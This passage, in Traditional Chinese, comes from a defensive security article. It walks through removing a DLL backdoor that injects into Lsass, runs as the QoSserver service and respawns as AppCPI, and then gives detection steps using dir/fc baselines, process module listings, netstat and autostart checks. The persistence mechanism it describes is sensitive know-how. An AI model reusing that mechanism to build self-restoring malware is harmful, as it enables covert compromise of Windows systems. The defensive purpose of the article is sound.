后門在安裝成功后,會在服務中添加一個名為QoSserver的服務,并把QoSserver.dll后門文件插入到Lsass進程當中,使其可以隱藏進程并自動啟動(如圖9)。現在我們打開注冊表,來到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\QoSserver,直接刪除QoSserver鍵,然后重啟。重啟之后,我們在來到服務列表中,會看到QoSserver服務還在,但沒有啟動,類別是自動,我們把他修改為"已禁用";然后往上看,會發現一個服務名為AppCPI的服務,其可執行程序指向QoSserver.exe(原因后邊我會說到),具體如圖11所示。我們再次打開注冊表,來到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppCPI,刪除AppCPI鍵,重啟,再刪除QoSserver,最后刪除WINNT\system32目錄下的后門文件。
本人和這個后門"搏斗"了3個多小時,重啟N次。原因在于即使刪除了QoSserver服務,后門還是在運行,而且服務列表中的QoSserver服務又"死灰復燃"。后來才知道原因:在我刪除了QoSserver服務并重啟之后,插入到Lsass進程當中的QoSserver.dll文件又恢復了QoSserver服務,并且生成了另外一個服務,即AppCPI,所以我們必須在到注冊表中刪除AppCPI服務才算是把該后門清除。由此可以看出,現在的后門的保護措施,真是一環扣環。
注意:在刪除QoSserver服務并重啟之后,恢復的QoSserver的啟動類別要修改為"已禁用",否則即便刪除了AppCPI服務,QoSserver服務又運行了。
三,DLL的防范
看了上邊的例子,我想大家對清除DLL后門的方法有了一定的了解,但在現實中,DLL后門并不會使用默認的文件名,所以你也就不能肯定是否中了DLL后門。對于DLL后門,system32目錄下是個好地方,大多數后門也是如此,所以這里要非常注意。下面我來具體介紹一下怎么發現DLL后門,希望對大家有所幫助。
1,安裝好系統和所有的應用程序之后,備份system32目錄下的EXE和DLL文件:打開CMD,來到WINNT\system32目錄下,執行:dir *.exe>exe.txt & dir *.dll>dll.txt,這樣,就會把所有的EXE和DLL文件備份到exe.txt和dll.txt文件中;日后,如發現異常,可以使用相同的命令再次備份EXE和DLL文件(這里我們假設是exe0.txt和dll0.txt),并使用:fc exe.txt exe0.txt>exedll.txt & fc dll.txt dll0.txt>exedll.txt,其意思為使用FC命令比較兩次的EXE文件和DLL文件,并將比較結果保存到exedll.txt文件中。通過這種方法,我們就可以發現多出來的EXE和DLL文件,并通過文件大小,創建時間來判斷是否是DLL后門。
2,使用內存/模塊工具來查看進程調用的DLL文件,比如Windows優化大師中的Windows 進程管理 2.5。這樣,可以發現進程到底調用了什么DLL文件,在結合上邊用FC命令比較出來的結果,又能進一步來確定是否中了DLL后門。如果沒有優化大師,可以使用TaskList,這個小工具也可以顯示進程調用的DLL文件,而且還有源代碼,方便修改。
3,普通后門連接需要打開特定的端口,DLL后門也不例外,不管它怎么隱藏,連接的時候都需要打開端口。我們可以用netstat -an來查看所有TCP/UDP端口的連接,以發現非法連接。大家平時要對自己打開的端口心中有數,并對netstat -an中的state屬性有所了解。當然,也可以使用Fport來顯示端口對應的進程,這樣,系統有什么不明的連接和端口,都可以盡收眼底。
4,定期檢查系統自動加載的地方,比如:注冊表,Winstart.bat,Autoexec.bat,win.ini,system.ini,wininit.ini,Autorun.inf,Config.sys等。其次是對服務進行管理,對系統默認的服務要有所了解,在發現有問題的服務時,可以使用Windows 2000 Server Resource Kit中的SC來刪除。以上這些地方都可以用來加載DLL后門的Loader,如果我們把DLL后門Loader刪除了,試問?DLL后門還怎么運行?!
通過使用上邊的方法,我想大多數DLL后門都可以"現形",如果我們平時多做一些備份,那對查找DLL后門會啟到事半功倍的效果。
